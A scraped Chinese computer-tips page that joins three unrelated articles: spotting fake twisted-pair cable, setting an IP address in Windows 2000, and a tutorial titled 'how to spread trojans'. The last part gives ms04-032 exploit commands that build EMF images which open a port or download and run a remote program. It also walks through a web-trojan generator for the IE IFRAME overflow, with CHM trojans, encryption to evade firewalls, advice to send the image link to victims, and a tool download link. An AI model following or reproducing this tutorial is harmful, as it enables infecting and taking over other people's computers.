热点推荐:
您现在的位置: 电脑学习网 >> 网络技术 >> 正文

如何鉴别双绞线的优劣?

2013-09-12 16:07:22  来源: 网络技术 
1.看
(1)看包装箱质地和印刷。仔细查看线缆的箱体,包装是否完好,假货在这方面是能省就省的,所以外包装质量可以决定用户的第一感觉。真品双绞线的包装纸箱,从材料质地到文字印刷都应当相当不错,纸板挺括边缘清晰。而且许多厂家还在产品外包装上贴上了防伪标志。
(2)看外皮颜色及标识。双绞线绝缘皮上应当印有诸如厂商产地、执行标准、产品类别(如CAT5e、C6T等)、线长标识之类的字样。
(3)看绞合密度。为了降低信号的干扰,双绞线电缆中的每一线对都以逆时针方向相互绞合(也称扭绕)而成,同一电缆中的不同线对也具有不同的绞合度。除线对的两条绝缘铜导线要按要求进行绞合外,电缆中的线对之间也要按逆时针方向进行绞合。如果绞合密度不符合技术要求,将由于电缆电阻的不匹配,导致较为严重的近端串扰,从而缩短传输距离、降低传输速率。如果发现电缆中所有线对的扭绕密度相同,或线对的扭绕密度不符合技术要求,或线对的扭绕方向不符合要求,均可判定为伪品。
(4)看导线颜色。剥开双绞线的外层胶皮后,可以看到里面由颜色不同的四对八根细线,依次为橙、绿、蓝、棕,每一对线中有一根色线和一根混色线组成。需要注意的是,这些颜色绝对不是后来用染料染上去的,而是使用相应的塑料制成的。没有颜色、颜色不清或染色的网线,肯定不是真线。(本文为WWW.SQ120.COM电脑知识网推荐文章)
(5)看阻燃情况。WWw.ItCOmpUter.com.Cn为了避免受高温或起火而导致线缆的燃烧和损坏,双绞线最外面的一层包皮除应具有很好的抗拉特性外,还应具有阻燃性。正品网线的外皮会在焰火的烧烤之下,逐步被熔化变形,但外皮肯定不会自己燃烧。不阻燃的线肯定不是真品。
2.摸
(1)在通常的情况下也可以通过手指触摸双绞线的外皮来做最初的判断。假线为节省成本,采用低劣的线材,手感发粘,有一定的停滞感,质量很差。真线手感舒服,外皮光滑。
(2)用手捏一捏线体,手感应当饱满。线缆还应当可以随意弯曲,以方便布线。考虑到网线在布线时经常需要弯曲,因此许多正规厂商在制作网线都给外皮留有了一定的伸展性,以保证网线在弯曲时不受损伤。因此,双手用力拉正规网线时,发现外皮都具有伸展性。品质良好的网线在设计时考虑到布线的方便性,尽量做到很柔韧,无论怎样弯曲都很方便,而且不容易被折断。为了使双绞线在移动中不致于断线,除外皮保护层外,内部的铜芯还要具有一定的韧性。铜芯既不能太软,也不能太硬,太软或太硬都表明铜的纯度不够,将严重影响网线的电气性能。  
如何给网卡指定ip 问:在局域网中,工作站使用Windows 2000操作系统接入服务器。这时,在工作站上,如何给网卡指定IP地址?
答:在Windows 2000系统中配置IP地址,与在Windows 98系统下的操作稍有不同,具体操作如下:
第一步,保证网卡物理安装正确,并安装好合适的网卡驱动程序。
第二步,在桌面用鼠标右键单击“网上邻居”→“属性”,这时将弹出“网络和拨号连接”窗口。
第三步,选中“本地连接”并单击鼠标右键,打开“本地连接 属性”对话框。(本文为WWW.SQ120.COM电脑知识网推荐文章)
第四步,在“组件”列表中找到“Internet协议(TCP/IP)”一项,然后单击“属性”按钮,打开“Internet协议(TCP/IP)属性”对话框。
第五步,如果此时局域网中已设置了DHCP服务器,或有服务器具有DHCP功能,则勾选“自动获得IP地址”,并输入DNS服务器IP地址。
如果工作站得到分配的局域网内部的固定IP地址,则勾选“使用下面IP地址”一项,并输入相应的IP地址、子网掩码、网关地址等信息。
如需进一步设置DNS、WINS、IP安全机制等内容,则可以单击“高级”按钮,在弹出的对话框中实现。
第六步,设置完成后,连续单击“确定”退出。  
如何传播木马

  各式各样的木马程序之所以会在网络上横行,网页传播是功不可没的。相对于其他传播途径,网页传播的危害面非常广泛,而IE层出不穷的漏洞也使很多朋友在不知不觉中中招。这一期的木马屠城,笔者就针对如何传播木马这一问题,对最近较经典的网页木马传播方式进行剖析,让大家知道这些“夹心”网页中的木马是怎样将用户杀于无形之中的。
图形渲染漏洞
  大家可曾想过浏览一个图片文件就会中木马,并且还不是以前的那种以“.JPEG”结尾的木马,因为Windows又给黑客们爆出了一个更新的可利用漏洞。(本文为WWW.SQ120.COM电脑知识网推荐文章)
  在Windows XP SP1、Windows Server 2003、Windows 2000 SP4中,系统对Windows图像文件(WMF)和增强型图像文件(EMF)图像格式进行的渲染存在一个远程代码执行漏洞,它使得恶意攻击者可以在受影响的系统上执行远程代码。漏洞的利用十分简单,我们只需要使用ms04-032溢出程序即可生成带溢出效果的EMF图片。
  进入命令提示符窗口,输入格式为“ms04-32.exe <生成的文件名> <生成方式> <端口号(溢出方式①)/下载程序地址(溢出方式②)>”的命令。
  提示:溢出方式可分为“1-端口方式溢出”和“2-下载溢出”。
  例如输入“ms04-32 1.emf 1 21”,这样就生成了一个可以打开21端口的EMF图片(图1)。图1
  提示:输入“ms04-32 test.emf 2 http://www.xxx.xxx/xxx.exe”,就生成了一个可以自动在http://www.xxx.xxx/xxx.exe下载并自动运行xxx.exe这个程序的EMF图片。
  现在只要把此图片上传到自己的空间,然后将图片地址发给对方,没有及时更新补丁的用户看了图片后就会在不知情的情况下中招。
IFRAME溢出型木马
  在这里笔者要给大家介绍的是如何让对方通过访问一个看似平常的网页,而不知不觉地中木马。这是网页木马传播最主要的途径,因为看似平常的网页浏览,也会带来很多严重的后果。
  当IFRAME溢出公布后,网上就有高手针对已经公布的恶意代码进行了修改并写成了专门的木马生成器,使得它能顺利地工作在Windows 98、Windows Me、Windows 2000、Windows XP SP1(IE6)等系统下。由于它的危害很大,安装了IE6的电脑会受到iFrame漏洞的影响(不包括已升级到Windows XP SP2的系统)。
  运行wymmpro.exe程序后,出现如图2所示的界面。首先在第一行填入已准备好的木马程序路径(网络路径),接下来在第二栏中选择IE的弹出方式和自定义生成的木马网页名。建议大家选择第一项,这样就可防止某些系统拦截所弹出的窗口。 

图2
  接下来在第三栏中选择默认的大内存方式(用于网页木马)。为了防止对方使用的是IE5.0/5.5而不会中招,我们可以在此生成CHM木马来达到传播的目的,我们只需要把准备好的木马程序放到木马生成器的CHM目录下,并根据提示填写好木马程序名和欲生成的CHM文件名以及用来存放该CHM的网络地址即可。
  最后就是包装工作,我们可以选择对生成的网页木马代码进行压缩或加密,防止被带网页代码监控功能的防火墙拦截。现在,一个活生生的网页木马就制作好了。
  软件下载地址:http://www.sixvee.com/520yy/tools/cytkk-3.rar

 
From:http://www.itcomputer.com.cn/Article/Network/201309/1033.html
    Copyright © 2005-2013 电脑知识网 Computer Knowledge   All rights reserved.